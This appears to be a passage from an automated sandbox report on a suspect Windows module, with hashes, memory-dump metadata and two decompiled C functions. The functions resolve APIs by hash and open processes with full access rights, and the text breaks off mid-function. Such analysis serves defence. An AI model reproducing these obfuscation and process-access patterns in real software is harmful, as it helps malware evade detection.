0x6eb21c75
0x6eb21c8b
0x6eb21c96
0x6eb21c97
0x6eb21c98
0x6eb21c99
0x6eb21c9a
0x6eb21c9d
0x6eb21ca0
0x6eb21ca1
0x6eb21ca2
0x6eb21ca9
0x6eb21cac
0x6eb21cb7
0x6eb21cbe
0x6eb21cc7
0x6eb21ccf
0x6eb21cd6
0x6eb21cdf
0x6eb21ce7
0x6eb21cee
0x6eb21cf7
0x6eb21cff
0x6eb21d04
0x6eb21d0d
0x6eb21d15
0x6eb21d2a

Strings

8nsK, xrefs: 6EB21900

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction ID: 3433d72f92500e0d654d786e7d5be5c9c94a844f5132aa8009a41d3872999d1e
Opcode Fuzzy Hash: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction Fuzzy Hash: E632D6728246459EC715DF60C8509FFBBA4AF61208F204F2DB45D7A1B2FFB1AA86C641

Uniqueness

Uniqueness Score: -1.00%

Function 6EB2A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6EB2A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6EB2B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6EB2F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6EB2F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6EB32234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6EB2F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6EB2F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6EB2F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6eb3b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6EB33064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6EB2F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6EB2B5C4(_t439 + 0x34);
											E6EB2B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6EB2B5C4(_t439 + 0x34);
										E6EB2B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6EB2F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6EB2CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6EB2C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6EB2F828(_t439 + 0x14, E6EB2F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6EB2F4BC(_t439 + 0x14, E6EB2F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6EB33064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6EB2F828(_t439 + 0x40, E6EB2F4CC(_t439 + 0x3c) + 4);
											 *(E6EB2F4BC(_t439 + 0x40, E6EB2F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6EB2CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6EB2F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6EB2F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6EB2AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6EB2CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6EB2F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6EB2F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6EB338F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6EB2F828( *((intOrPtr*)(_t439 + 8)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6EB2F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6EB2F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6EB338F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6EB2F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6EB2F828( *((intOrPtr*)(_t439 + 4)), E6EB2F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6EB2F828( *((intOrPtr*)(_t439 + 8)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6EB2F4BC( *((intOrPtr*)(_t439 + 8)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6EB2F828( *((intOrPtr*)(_t439 + 4)), E6EB2F4CC( *_t439) + 4);
								 *(E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), E6EB2F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6EB2F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6EB33064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6EB2F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6EB2F828( *((intOrPtr*)(_t439 + 8)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6EB2F4BC( *((intOrPtr*)(_t439 + 8)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6EB2F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6EB2F828( *((intOrPtr*)(_t439 + 4)), E6EB2F4CC( *_t439) + 4);
										 *(E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), E6EB2F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6EB2F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6EB2F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6EB338F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6EB2F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6EB2F828( *((intOrPtr*)(_t439 + 4)), E6EB2F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6EB33064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6EB2F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6EB2F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6EB2F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6EB2F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6EB338F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6EB2F828( *((intOrPtr*)(_t439 + 8)), E6EB2F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EB2F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6eb2a4f2
0x6eb2a4f4
0x6eb2a4ff
0x6eb2a505
0x6eb2a509
0x6eb2a50e
0x6eb2a514
0x6eb2a524
0x00000000
0x6eb2a526
0x6eb2a526
0x6eb2a531
0x6eb2a531
0x6eb2aaaf
0x6eb2aab1
0x6eb2aab2
0x6eb2aaf1
0x6eb2aaf5
0x6eb2ab03
0x6eb2ab11
0x6eb2ab11
0x6eb2aafc
0x6eb2ab17
0x6eb2ab1c
0x00000000
0x6eb2ab1c
0x6eb2ab00
0x6eb2ab01
0x00000000
0x6eb2a53b
0x6eb2a53b
0x6eb2a53f
0x6eb2a646
0x6eb2a646
0x6eb2a64b
0x6eb2a75c
0x6eb2a760
0x6eb2a765
0x6eb2a769
0x6eb2a893
0x6eb2a895
0x6eb2a899
0x6eb2a8a2
0x6eb2a8ab
0x6eb2a8af
0x6eb2a8b8
0x6eb2a8bf
0x6eb2a8c0
0x6eb2a8c4
0x6eb2a8c8
0x6eb2a8cc
0x6eb2a8ce
0x6eb2aa38
0x6eb2aa38
0x6eb2aa40
0x6eb2aa58
0x6eb2aa5a
0x6eb2aa5c
0x6eb2aa96
0x6eb2aa96
0x6eb2aa98
0x6eb2aa98
0x6eb2aa9b
0x6eb2aab6
0x6eb2aaca
0x6eb2aacd
0x6eb2aad2
0x6eb2aadd
0x6eb2aade
0x6eb2aae1
0x6eb2aae3
0x6eb2aaec
0x00000000
0x6eb2aaec
0x6eb2aa9d
0x6eb2aaa1
0x6eb2aaaa
0x00000000
0x6eb2aaaa
0x6eb2aa6d
0x6eb2aa7d
0x6eb2aa81
0x6eb2aa81
0x6eb2aa84
0x6eb2aa87
0x6eb2aa8a
0x6eb2aa90
0x00000000
0x00000000
0x00000000
0x6eb2aa92
0x6eb2a8d6
0x6eb2a8d6
0x6eb2a8d8
0x6eb2a8dc
0x6eb2a8e1
0x6eb2a8e3
0x6eb2a8e7
0x6eb2a8ea
0x6eb2a8f2
0x6eb2a8f4
0x00000000
0x00000000
0x6eb2a90b
0x6eb2a926
0x6eb2a928
0x6eb2a93b
0x6eb2a93d
0x6eb2a93f
0x6eb2a95a
0x6eb2a95a
0x6eb2a95e
0x6eb2a960
0x00000000
0x00000000
0x6eb2a962
0x6eb2a965
0x6eb2a986
0x6eb2a9a5
0x6eb2a9ab
0x6eb2a9ae
0x6eb2a9b3
0x6eb2a9b4
0x6eb2a9b8
0x00000000
0x00000000
0x6eb2a9c0
0x6eb2a9c0
0x6eb2a9c2
0x6eb2a9ce
0x6eb2a9da
0x6eb2a9e4
0x6eb2a9e7
0x6eb2a9ea
0x6eb2a9ee
0x6eb2a9f5
0x6eb2a9f9
0x6eb2a9fd
0x6eb2a9fe
0x6eb2aa02
0x6eb2aa07
0x6eb2aa0c
0x6eb2aa10
0x6eb2aa14
0x6eb2aa1a
0x6eb2aa20
0x6eb2aa26
0x6eb2aa2c
0x6eb2aa31
0x6eb2aa32
0x6eb2aa32
0x00000000
0x6eb2a9c2
0x00000000
0x6eb2a965
0x6eb2a943
0x6eb2a954
0x6eb2a956
0x6eb2a958
0x00000000
0x00000000
0x00000000
0x6eb2a958
0x6eb2a96b
0x00000000
0x6eb2a96b
0x6eb2a76f
0x6eb2a772
0x6eb2a774
0x00000000
0x00000000
0x6eb2a77c
0x6eb2a77c
0x6eb2a77e
0x6eb2a77e
0x6eb2a78f
0x6eb2a791
0x6eb2a794
0x00000000
0x00000000
0x6eb2a88a
0x6eb2a88b
0x6eb2a88d
0x00000000
0x00000000
0x00000000
0x6eb2a88d
0x6eb2a79a
0x6eb2a79d
0x6eb2a7a7
0x6eb2a7ac
0x6eb2a7ae
0x6eb2a7b4
0x6eb2a7bb
0x6eb2a7bf
0x6eb2a7c4
0x6eb2a7c8
0x6eb2ac03
0x6eb2ac17
0x6eb2ac3a
0x6eb2ac3f
0x6eb2ac3f
0x6eb2a7df
0x6eb2a7e4
0x6eb2a7e4
0x6eb2a7e4
0x6eb2a7e4
0x6eb2a7ea
0x6eb2a7ef
0x6eb2a7f1
0x6eb2a7f6
0x6eb2a7fd
0x6eb2a802
0x6eb2a804
0x6eb2abc1
0x6eb2abd2
0x6eb2abec
0x6eb2abf1
0x6eb2abf1
0x6eb2a81a
0x6eb2a81f
0x6eb2a81f
0x6eb2a81f
0x6eb2a81f
0x6eb2a833
0x6eb2a851
0x6eb2a856
0x6eb2a866
0x6eb2a883
0x6eb2a885
0x6eb2a885
0x00000000
0x6eb2a79d
0x6eb2a653
0x6eb2a653
0x6eb2a655
0x6eb2a65c
0x6eb2a66a
0x6eb2a66c
0x6eb2a66f
0x6eb2a676
0x6eb2a678
0x6eb2a6a9
0x6eb2a6b8
0x6eb2a6ba
0x6eb2a6bc
0x6eb2a6da
0x6eb2a6dc
0x6eb2a6de
0x6eb2a6f1
0x6eb2a710
0x6eb2a716
0x6eb2a719
0x6eb2a730
0x6eb2a74c
0x6eb2a74e
0x6eb2a74e
0x6eb2a74e
0x6eb2a74e
0x6eb2a6de
0x00000000
0x6eb2a6bc
0x6eb2a67c
0x6eb2a67c
0x6eb2a67e
0x6eb2a68f
0x6eb2a691
0x6eb2a693
0x00000000
0x00000000
0x6eb2a69f
0x6eb2a6a0
0x6eb2a6a7
0x00000000
0x00000000
0x00000000
0x6eb2a6a7
0x6eb2a695
0x6eb2a698
0x00000000
0x00000000
0x6eb2a751
0x6eb2a751
0x6eb2a752
0x6eb2a752
0x00000000
0x6eb2a545
0x6eb2a547
0x6eb2a547
0x6eb2a549
0x6eb2a550
0x6eb2a55e
0x6eb2a560
0x6eb2a564
0x6eb2a568
0x6eb2a56a
0x6eb2a598
0x6eb2a59b
0x6eb2a5a0
0x6eb2a5a4
0x6eb2a5a9
0x6eb2a5b0
0x6eb2a5b5
0x6eb2a5b7
0x6eb2ab7e
0x6eb2ab8f
0x6eb2abaf
0x6eb2abb4
0x6eb2abb4
0x6eb2a5cd
0x6eb2a5d2
0x6eb2a5d2
0x6eb2a5d2
0x6eb2a5d2
0x6eb2a5e4
0x6eb2a5e6
0x6eb2a5e8
0x6eb2a5f9
0x6eb2a5f9
0x6eb2a5ff
0x6eb2a604
0x6eb2a608
0x6eb2a60e
0x6eb2a615
0x6eb2a61a
0x6eb2a61c
0x6eb2ab32
0x6eb2ab43
0x6eb2ab64
0x6eb2ab69
0x6eb2ab69
0x6eb2a633
0x6eb2a638
0x6eb2a638
0x6eb2a638
0x6eb2a638
0x6eb2a63b
0x6eb2a63b
0x00000000
0x6eb2a63b
0x6eb2a56e
0x6eb2a56e
0x6eb2a570
0x6eb2a581
0x6eb2a583
0x6eb2a585
0x00000000
0x00000000
0x6eb2a591
0x6eb2a592
0x6eb2a596
0x00000000
0x00000000
0x00000000
0x6eb2a596
0x6eb2a587
0x6eb2a58a
0x00000000
0x00000000
0x6eb2a63c
0x6eb2a63c
0x6eb2a63d
0x6eb2a63d
0x00000000
0x6eb2a549
0x6eb2a53f

Strings

, xrefs: 6EB2AAF7

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 85015e5ee66ab99d5d824b6d205f39d34499992d6a9214d6d7a6c0a13ea25020
Instruction ID: fd3d0c4080bb95868cb4b299668fe6a0e5651db7155b3e5072ef4adb484c194f
Opcode Fuzzy Hash: 85015e5ee66ab99d5d824b6d205f39d34499992d6a9214d6d7a6c0a13ea25020
Instruction Fuzzy Hash: 541272719142819FC715DFA4C880ABEBBA9EF85704F104E3DE9ADA72A5DB709D01CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6EB28428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EB28428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6EB2B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6EB2F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6EB2F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6EB32234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6EB2F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6EB2F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6EB2F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6EB2F4BC(_t449 + 0x14, 0);
									_t180 = E6EB32908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6EB2B5C4(_t449 + 0x34);
										E6EB2B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6EB2F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6EB2F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6EB2B5C4(_t449 + 0x34);
										E6EB2B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6EB2CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6EB2C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6EB2F828(_t449 + 0x14, E6EB2F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6EB2F4BC(_t449 + 0x14, E6EB2F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6EB33064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
